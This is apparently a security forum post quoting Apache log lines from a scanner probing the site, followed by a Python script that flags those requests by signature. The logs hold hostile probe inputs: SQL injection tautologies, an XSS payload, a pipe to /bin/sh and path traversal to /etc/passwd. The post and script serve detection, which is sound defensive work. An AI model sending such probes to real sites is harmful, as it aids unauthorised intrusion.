Wannabe Defacer (190.82.180.249)

RaT

After going to https://www.soldierx.com//bbs/201301/Owning-and-Proud-Brave-Defacers-indeed, 190.82.180.249 hit us with some lame attacks (including a Vega scan).

Lulzy snippets follow:

190.82.180.249 - - [21/Jul/2013:22:24:03 -0400] "GET / HTTP/1.1" 200 11731 "-" "UserAgent"
190.82.180.249 - - [21/Jul/2013:22:24:07 -0400] "GET / HTTP/1.1" 200 8259 "-" "UserAgent"
190.82.180.249 - - [21/Jul/2013:22:24:12 -0400] "GET /nosuchpage123 HTTP/1.1" 404 3541 "-" "UserAgent"
190.82.180.249 - - [21/Jul/2013:22:24:15 -0400] "GET /lpt9 HTTP/1.1" 404 3380 "-" "UserAgent"
190.82.180.249 - - [21/Jul/2013:22:24:15 -0400] "GET /~nosuchpage123 HTTP/1.1" 404 3541 "-" "UserAgent"
190.82.180.249 - - [21/Jul/2013:22:24:15 -0400] "GET /nosuchpage123 HTTP/1.1" 404 3541 "-" "UserAgent"
190.82.180.249 - - [21/Jul/2013:22:24:17 -0400] "GET /?_test1=c:\\windows\\system32\\cmd.exe&_test2=/etc/passwd&_test3=|/bin/sh&_test4=(SELECT%20*%20FROM%20nonexistent)%20--&_test5=>/no/such/file&_test6=<script>alert(1)</script>&_test7=javascript:alert(1) HTTP/1.1" 200 8164 "-" "UserAgent"
190.82.180.249 - - [21/Jul/2013:22:24:17 -0400] "GET /?_test1=ccddeeeimmnossstwwxy.:\\\\\\&_test2=acdepsstw//&_test3=bhins//&_test4=CEEFLMORSTeeinnnosttx-*&_test5=cefhilnosu///&_test6=acceiilpprrrssttt1)(&_test7=aaaceijlprrsttv1):( HTTP/1.1" 200 8052 "-" "UserAgent"
190.82.180.249 - - [21/Jul/2013:22:24:20 -0400] "GET /sites/ HTTP/1.1" 403 820 "-" "UserAgent"
190.82.180.249 - - [21/Jul/2013:22:24:21 -0400] "GET /modules/ HTTP/1.1" 403 965 "-" "UserAgent"
190.82.180.249 - - [21/Jul/2013:22:24:22 -0400] "GET /misc/ HTTP/1.1" 403 965 "-" "UserAgent"
190.82.180.249 - - [21/Jul/2013:22:24:20 -0400] "GET /news/ HTTP/1.1" 301 660 "-" "UserAgent"
190.82.180.249 - - [21/Jul/2013:22:24:21 -0400] "GET /https:/ HTTP/1.1" 404 3541 "-" "UserAgent"
190.82.180.249 - - [21/Jul/2013:22:24:21 -0400] "GET /VIP-Only HTTP/1.1" 200 3682 "-" "UserAgent"
190.82.180.249 - - [21/Jul/2013:22:24:21 -0400] "GET /blog HTTP/1.1" 200 9864 "-" "UserAgent"
190.82.180.249 - - [21/Jul/2013:22:24:21 -0400] "GET /hdb HTTP/1.1" 200 5651 "-" "UserAgent"
190.82.180.249 - - [21/Jul/2013:22:24:22 -0400] "GET /Forums/ HTTP/1.1" 301 805 "-" "UserAgent"
190.82.180.249 - - [21/Jul/2013:22:24:22 -0400] "GET /modules/nosuchpage123 HTTP/1.1" 404 3541 "-" "UserAgent"
190.82.180.249 - - [21/Jul/2013:22:24:22 -0400] "GET /misc/nosuchpage123 HTTP/1.1" 404 3396 "-" "UserAgent"
190.82.180.249 - - [21/Jul/2013:22:24:22 -0400] "GET /sites/nosuchpage123 HTTP/1.1" 404 3541 "-" "UserAgent"
190.82.180.249 - - [21/Jul/2013:22:24:22 -0400] "GET /user/ HTTP/1.1" 301 805 "-" "UserAgent"
190.82.180.249 - - [21/Jul/2013:22:24:22 -0400] "GET /frontpage HTTP/1.1" 301 789 "-" "UserAgent"
190.82.180.249 - - [21/Jul/2013:22:24:22 -0400] "GET /sxlabs/ HTTP/1.1" 301 805 "-" "UserAgent"
190.82.180.249 - - [21/Jul/2013:22:24:21 -0400] "GET /quotes/ HTTP/1.1" 301 805 "-" "UserAgent"
190.82.180.249 - - [21/Jul/2013:22:24:22 -0400] "GET /rss.xml HTTP/1.1" 200 4501 "-" "UserAgent"
190.82.180.249 - - [21/Jul/2013:22:24:22 -0400] "GET /users/ HTTP/1.1" 301 805 "-" "UserAgent"
190.82.180.249 - - [21/Jul/2013:22:24:22 -0400] "GET /bbs/ HTTP/1.1" 301 805 "-" "UserAgent"
190.82.180.249 - - [21/Jul/2013:22:24:21 -0400] "GET /aggregator HTTP/1.1" 200 7123 "-" "UserAgent"
190.82.180.249 - - [21/Jul/2013:22:24:24 -0400] "GET /news/nosuchpage123 HTTP/1.1" 404 3396 "-" "UserAgent"

and

190.82.180.249 - - [21/Jul/2013:22:24:37 -0400] "GET /https:?_test1=c:\\windows\\system32\\cmd.exe&_test2=/etc/passwd&_test3=|/bin/sh&_test4=(SELECT%20*%20FROM%20nonexistent)%20--&_test5=>/no/such/file&_test6=<script>alert(1)</script>&_test7=javascript:alert(1) HTTP/1.1" 404 3396 "-" "UserAgent"
190.82.180.249 - - [21/Jul/2013:22:24:38 -0400] "GET /Forums/nosuchpage123 HTTP/1.1" 404 3396 "-" "UserAgent"
190.82.180.249 - - [21/Jul/2013:22:24:37 -0400] "GET /https:?_test1=ccddeeeimmnossstwwxy.:\\\\\\&_test2=acdepsstw//&_test3=bhins//&_test4=CEEFLMORSTeeinnnosttx-*&_test5=cefhilnosu///&_test6=acceiilpprrrssttt1)(&_test7=aaaceijlprrsttv1):( HTTP/1.1" 404 3396 "-" "UserAgent"
190.82.180.249 - - [21/Jul/2013:22:24:38 -0400] "GET /bbs/lpt9 HTTP/1.1" 404 3396 "-" "UserAgent"
190.82.180.249 - - [21/Jul/2013:22:25:23 -0400] "GET /frontpage?page=5'\" HTTP/1.1" 301 660 "vega'\"" "vega'\""
190.82.180.249 - - [21/Jul/2013:22:25:23 -0400] "GET /frontpage?page=5\\\\'\\\\\" HTTP/1.1" 301 676 "vega\\\\'\\\\\"" "vega\\\\'\\\\\""
190.82.180.249 - - [21/Jul/2013:22:25:24 -0400] "GET /frontpage?page=5%200%200%20-%20- HTTP/1.1" 301 676 "-" "UserAgent"
190.82.180.249 - - [21/Jul/2013:22:25:25 -0400] "GET /frontpage?page=5\\'\\\" HTTP/1.1" 301 676 "-" "UserAgent"
190.82.180.249 - - [21/Jul/2013:22:25:22 -0400] "GET /frontpage?page=5\\'\\\" HTTP/1.1" 301 676 "vega\\'\\\"" "vega\\'\\\""
190.82.180.249 - - [21/Jul/2013:22:25:22 -0400] "GET /frontpage?page=5-0-0 HTTP/1.1" 301 660 "-" "UserAgent"
190.82.180.249 - - [21/Jul/2013:22:25:24 -0400] "GET /frontpage?page=5%20-%200%20-%200 HTTP/1.1" 301 676 "-" "UserAgent"
190.82.180.249 - - [21/Jul/2013:22:25:22 -0400] "GET /Neophytes-Guide-What-are-common-types-seen-hacking-communities HTTP/1.1" 200 4674 "-" "UserAgent"
190.82.180.249 - - [21/Jul/2013:22:25:26 -0400] "GET /frontpage?page=5%20OR%201=1%20--%20 HTTP/1.1" 301 676 "-" "UserAgent"
190.82.180.249 - - [21/Jul/2013:22:25:26 -0400] "GET /frontpage?page=5'%20OR%201=2%20--%20 HTTP/1.1" 301 676 "-" "UserAgent"
190.82.180.249 - - [21/Jul/2013:22:25:25 -0400] "GET /frontpage?page=5\\\\'\\\\\" HTTP/1.1" 301 676 "-" "UserAgent"
190.82.180.249 - - [21/Jul/2013:22:25:25 -0400] "GET /frontpage?page=5'%20OR%201%20=%201%20--%20 HTTP/1.1" 301 692 "-" "UserAgent"
190.82.180.249 - - [21/Jul/2013:22:25:26 -0400] "GET /frontpage?page=5\"%20OR%201=1%20--%20 HTTP/1.1" 301 676 "-" "UserAgent"
190.82.180.249 - - [21/Jul/2013:22:25:25 -0400] "GET /frontpage?page=5'\"'\"'\"'\" HTTP/1.1" 301 676 "-" "UserAgent"
190.82.180.249 - - [21/Jul/2013:22:25:25 -0400] "GET /frontpage?page=5''''\"\"\"\" HTTP/1.1" 301 676 "-" "UserAgent"
190.82.180.249 - - [21/Jul/2013:22:25:27 -0400] "GET /frontpage?page=5\"%20OR%201=2%20--%20 HTTP/1.1" 301 676 "-" "UserAgent"
190.82.180.249 - - [21/Jul/2013:22:25:27 -0400] "GET /frontpage?page=5' HTTP/1.1" 301 660 "-" "UserAgent"
190.82.180.249 - - [21/Jul/2013:22:25:25 -0400] "GET /frontpage?page=5'\" HTTP/1.1" 301 660 "-" "UserAgent"
190.82.180.249 - - [21/Jul/2013:22:25:29 -0400] "GET /frontpage?page=/././5 HTTP/1.1" 301 821 "-" "UserAgent"
190.82.180.249 - - [21/Jul/2013:22:25:28 -0400] "GET /frontpage?page=...\\5 HTTP/1.1" 301 660 "-" "UserAgent"
190.82.180.249 - - [21/Jul/2013:22:25:28 -0400] "GET /frontpage?page=./5 HTTP/1.1" 301 660 "-" "UserAgent"
190.82.180.249 - - [21/Jul/2013:22:25:28 -0400] "GET /frontpage?page=.\\5 HTTP/1.1" 301 660 "-" "UserAgent"
190.82.180.249 - - [21/Jul/2013:22:25:28 -0400] "GET /frontpage?page=.../5 HTTP/1.1" 301 660 "-" "UserAgent"
190.82.180.249 - - [21/Jul/2013:22:25:28 -0400] "GET /frontpage?page=\\..\\5 HTTP/1.1" 301 660 "-" "UserAgent"
190.82.180.249 - - [21/Jul/2013:22:25:28 -0400] "GET /frontpage?page=/./5 HTTP/1.1" 301 660 "-" "UserAgent"
190.82.180.249 - - [21/Jul/2013:22:25:27 -0400] "GET /frontpage?page=5'' HTTP/1.1" 301 660 "-" "UserAgent"
190.82.180.249 - - [21/Jul/2013:22:25:28 -0400] "GET /frontpage?page=/../5 HTTP/1.1" 301 660 "-" "UserAgent"
190.82.180.249 - - [21/Jul/2013:22:25:28 -0400] "GET /frontpage?page=/../../../../../../../../../../../etc/passwd%005 HTTP/1.1" 301 724 "-" "UserAgent"

Anyways, thanks lamer. You've given us some new strings to detect/block on.
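
Added example, not part of the original post and not SoldierX's own tooling: one way to turn the request patterns quoted above into per-client detection counts over an Apache combined-format access log. The signature names, the regexes and the sample lines (documentation IPs, modelled on the requests in the post) are constructed for illustration.

```python
import re
from collections import defaultdict

# Apache combined log format; quoted fields may hold backslash-escaped quotes.
Q = r'"((?:[^"\\]|\\.)*)"'
LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] ' + Q + r' \d{3} \S+ ' + Q + ' ' + Q + '$')

# Hypothetical signature set derived from the requests quoted in the post.
SIGNATURES = {
    "vega-marker": re.compile(r"vega", re.I),  # checked against referer/agent only
    "probe-params": re.compile(r"[?&]_test\d+="),
    "404-fingerprint": re.compile(r"/(?:~?nosuchpage123|lpt9)\b"),
    "sqli-tautology": re.compile(r"(?:%20|\s)OR(?:%20|\s)+1(?:%20|\s)*=(?:%20|\s)*[12]", re.I),
    "quote-fuzz": re.compile(r"""=[^&\s]*?(?:\\*['"]){2,}"""),
    "path-traversal": re.compile(r"(?:\.\.[/\\]){2,}|%00"),
}

def classify(line):
    """Return (client_ip, set of signature names) or None if the line is unparsable."""
    m = LINE.match(line.strip())
    if not m:
        return None
    ip, request, referer, agent = m.groups()
    hits = set()
    for name, rx in SIGNATURES.items():
        target = referer + " " + agent if name == "vega-marker" else request
        if rx.search(target):
            hits.add(name)
    return ip, hits

def summarize(lines):
    """Count signature hits per client; clients with no hits are omitted."""
    per_ip = defaultdict(lambda: defaultdict(int))
    for line in lines:
        parsed = classify(line)
        if parsed:
            for name in parsed[1]:
                per_ip[parsed[0]][name] += 1
    return {ip: dict(counts) for ip, counts in per_ip.items()}

# Constructed sample input (not the post's log lines).
SAMPLE = r'''
203.0.113.7 - - [21/Jul/2013:22:24:12 -0400] "GET /nosuchpage123 HTTP/1.1" 404 3541 "-" "UserAgent"
203.0.113.7 - - [21/Jul/2013:22:24:17 -0400] "GET /?_test1=x&_test2=/etc/passwd HTTP/1.1" 200 8164 "-" "UserAgent"
203.0.113.7 - - [21/Jul/2013:22:25:23 -0400] "GET /frontpage?page=5'\" HTTP/1.1" 301 660 "vega'\"" "vega'\""
203.0.113.7 - - [21/Jul/2013:22:25:26 -0400] "GET /frontpage?page=5%20OR%201=1%20--%20 HTTP/1.1" 301 676 "-" "UserAgent"
203.0.113.7 - - [21/Jul/2013:22:25:28 -0400] "GET /frontpage?page=/../../../etc/passwd%005 HTTP/1.1" 301 724 "-" "UserAgent"
198.51.100.20 - - [21/Jul/2013:22:26:01 -0400] "GET /blog HTTP/1.1" 200 9864 "-" "Mozilla/5.0"
'''.strip().splitlines()

if __name__ == "__main__":
    for ip, counts in summarize(SAMPLE).items():
        print(ip, sorted(counts.items()))
```
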